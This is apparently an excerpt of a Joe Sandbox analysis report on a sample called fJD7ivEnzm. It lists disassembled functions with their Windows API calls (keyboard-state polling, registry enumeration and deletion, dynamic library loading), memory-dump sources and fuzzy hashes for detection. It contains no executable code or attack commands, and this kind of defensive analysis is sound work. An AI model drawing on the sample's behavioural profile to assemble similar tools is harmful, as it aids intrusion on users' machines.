                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                                          • String ID: %s%d
                                                                          • API String ID: 2645982514-1110647743
                                                                          • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                          • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                                          • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                          • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                                          Function 00462A31 Relevance: 7.7, APIs: 5, Instructions: 227COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                          • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                                          • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                          • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                                          Function 004757A7 Relevance: 7.7, APIs: 5, Instructions: 220COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CloseCountersCurrentHandleOpen
                                                                          • String ID:
                                                                          • API String ID: 3488606520-0
                                                                          • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                          • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                                                          • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                          • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                                                          Function 0046B4CF Relevance: 7.7, APIs: 5, Instructions: 157registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ConnectRegistry_memmove_wcslen
                                                                          • String ID:
                                                                          • API String ID: 15295421-0
                                                                          • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                          • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                                                          • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                          • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                                                          Function 00464812 Relevance: 7.6, APIs: 5, Instructions: 145libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                                          • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$Library$FreeLoad
                                                                          • String ID:
                                                                          • API String ID: 2449869053-0
                                                                          • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                          • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                                                          • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                          • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                                                          Function 00456391 Relevance: 7.6, APIs: 5, Instructions: 130keyboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCursorPos.USER32(?), ref: 004563A6
                                                                          • ScreenToClient.USER32(?,?), ref: 004563C3
                                                                          • GetAsyncKeyState.USER32(?), ref: 00456400
                                                                          • GetAsyncKeyState.USER32(?), ref: 00456410
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                          • String ID:
                                                                          • API String ID: 3539004672-0
                                                                          • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                          • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                                                          • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                          • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                                                          Function 0047D40F Relevance: 7.6, APIs: 5, Instructions: 120sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                                          • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                                          • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                                          • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                                          • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Interlocked$DecrementIncrement$Sleep
                                                                          • String ID:
                                                                          • API String ID: 327565842-0
                                                                          • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                          • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                                                          • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                          • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                                                          Function 0045C3C1 Relevance: 7.6, APIs: 5, Instructions: 118COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                                          • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                                          • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: PrivateProfile$SectionWrite$String
                                                                          • String ID:
                                                                          • API String ID: 2832842796-0
                                                                          • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                                          • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                                                          • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                                          • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                                                          Function 00441C7B Relevance: 7.6, APIs: 5, Instructions: 108registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Enum$CloseDeleteOpen
                                                                          • String ID:
                                                                          • API String ID: 2095303065-0
                                                                          • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                          • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                                                          • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                          • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                                                          Function 00436A0B Relevance: 7.6, APIs: 5, Instructions: 103COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetWindowRect.USER32(?,?), ref: 00436A24
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: RectWindow
                                                                          • String ID:
                                                                          • API String ID: 861336768-0
                                                                          • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                          • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                                                          • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                          • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                                                          Function 00449555 Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32 ref: 00449598
                                                                            • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                          • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                                          • _wcslen.LIBCMT ref: 0044960D
                                                                          • _wcslen.LIBCMT ref: 0044961A
                                                                          • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$_wcslen$_wcspbrk
                                                                          • String ID:
                                                                          • API String ID: 1856069659-0
                                                                          • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                          • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                                                          • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                          • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                                                          Function 004478AC Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCursorPos.USER32(?), ref: 004478E2
                                                                          • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                                          • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                                          • GetCursorPos.USER32(00000000), ref: 0044796A
                                                                          • TrackPopupMenuEx.USER32(?,00000000,00000000,?,?,00000000), ref: 00447991
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: CursorMenuPopupTrack$Proc
                                                                          • String ID:
                                                                          • API String ID: 1300944170-0
                                                                          • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                          • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                                                          • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                          • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                                                          Function 004479A0 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetClientRect.USER32(?,?), ref: 004479CC
                                                                          • GetCursorPos.USER32(?), ref: 004479D7
                                                                          • ScreenToClient.USER32(?,?), ref: 004479F3
                                                                          • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                                          • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                          • String ID:
                                                                          • API String ID: 1822080540-0
                                                                          • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                          • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                                                          • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                          • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                                                          Function 00447BF1 Relevance: 7.6, APIs: 5, Instructions: 95COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                          • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                          • EndPaint.USER32(?,?), ref: 00447D13
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                          • String ID:
                                                                          • API String ID: 659298297-0
                                                                          • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                          • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                                                          • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                          • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                                                          Function 004487EA Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                          • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                          • ShowWindow.USER32(?,00000000), ref: 00448BE8
